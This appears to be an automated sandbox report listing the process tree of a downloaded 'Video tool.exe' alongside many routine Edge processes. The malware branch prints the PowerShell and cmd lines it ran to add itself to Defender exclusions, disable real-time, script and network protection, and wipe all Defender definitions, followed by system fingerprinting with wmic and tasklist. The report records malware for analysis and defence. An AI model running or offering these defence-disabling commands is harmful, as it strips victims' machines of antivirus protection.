- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2856 /prefetch:8
  2⤵
  PID:736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
  2⤵
  PID:4152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
  2⤵
  PID:908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
  2⤵
  PID:3756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1
  2⤵
  PID:620
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4036 /prefetch:8
  2⤵
  PID:2736
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4036 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4172 /prefetch:1
  2⤵
  PID:1908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1
  2⤵
  PID:1320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1
  2⤵
  PID:804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3092 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3948 /prefetch:8
  2⤵
  PID:4260
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:1
  2⤵
  PID:888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:1
  2⤵
  PID:4792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:1
  2⤵
  PID:3944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1
  2⤵
  PID:4460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4256 /prefetch:1
  2⤵
  PID:4504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:1
  2⤵
  PID:3688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3948 /prefetch:1
  2⤵
  PID:1520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:1
  2⤵
  PID:4140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:1
  2⤵
  PID:4284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1
  2⤵
  PID:4584
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:1
  2⤵
  PID:3756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6508 /prefetch:1
  2⤵
  PID:1620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6676 /prefetch:1
  2⤵
  PID:1424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7024 /prefetch:1
  2⤵
  PID:4792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7176 /prefetch:1
  2⤵
  PID:5048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7204 /prefetch:1
  2⤵
  PID:1892
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7616 /prefetch:1
  2⤵
  PID:2256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8104 /prefetch:1
  2⤵
  PID:5440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
  2⤵
  PID:5540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7984 /prefetch:1
  2⤵
  PID:5548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7492 /prefetch:1
  2⤵
  PID:5692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6252 /prefetch:1
  2⤵
  PID:3592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
  2⤵
  PID:5000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
  2⤵
  PID:4056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8088 /prefetch:1
  2⤵
  PID:5400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7804 /prefetch:1
  2⤵
  PID:5408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6228 /prefetch:1
  2⤵
  PID:3016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2868 /prefetch:1
  2⤵
  PID:5840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6772 /prefetch:1
  2⤵
  PID:5872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7300 /prefetch:1
  2⤵
  PID:5220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1
  2⤵
  PID:3836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:1
  2⤵
  PID:2028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7300 /prefetch:1
  2⤵
  PID:1616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6592 /prefetch:1
  2⤵
  PID:1644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7960 /prefetch:8
  2⤵
  PID:5164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2100,4876861614037711538,16565448373095117844,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6504 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5460
- C:\Users\Admin\Downloads\Video tool.exe
  "C:\Users\Admin\Downloads\Video tool.exe"
  2⤵
  - Executes dropped EXE
  PID:1704
- - C:\Users\Admin\Downloads\Video tool.exe
    "C:\Users\Admin\Downloads\Video tool.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3536
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Video tool.exe'"
      4⤵
      PID:5076
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Video tool.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3188
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:1300
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5000
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Ask Hassan for a Tool requierment installation is completed Discord id - unc12in12', 0, 'Done!', 48+16);close()""
      4⤵
      PID:5008
    - - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Ask Hassan for a Tool requierment installation is completed Discord id - unc12in12', 0, 'Done!', 48+16);close()"
        5⤵
        
        PID:4508
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1304
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5300
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:5700
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4912
- C:\Users\Admin\Downloads\Video tool.exe
  "C:\Users\Admin\Downloads\Video tool.exe"
  2⤵
  - Executes dropped EXE
  PID:3236
- - C:\Users\Admin\Downloads\Video tool.exe
    "C:\Users\Admin\Downloads\Video tool.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5728
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Video tool.exe'"
      4⤵
      PID:4072
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Video tool.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2752
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:5916
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5596
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Ask Hassan for a Tool requierment installation is completed Discord id - unc12in12', 0, 'Done!', 48+16);close()""
      4⤵
      PID:2820
    - - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Ask Hassan for a Tool requierment installation is completed Discord id - unc12in12', 0, 'Done!', 48+16);close()"
        5⤵
        
        PID:4460
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3224
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:5580
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:3772
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:3436

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1608

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2256

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2788

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:636
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /1
  2⤵
  - Checks SCSI registry key(s)
  PID:464

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\Temp\ASPNETSetup_00000.log
1⤵
- Opens file in notepad (likely ransom note)
PID:1932

C:\Windows\System32\ip2t47.exe
"C:\Windows\System32\ip2t47.exe"
1⤵
PID:4140

C:\Users\Admin\Downloads\Video tool.exe
"C:\Users\Admin\Downloads\Video tool.exe"
1⤵
- Executes dropped EXE
PID:2160
- C:\Users\Admin\Downloads\Video tool.exe
  "C:\Users\Admin\Downloads\Video tool.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Video tool.exe'"
    3⤵
    PID:5228
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
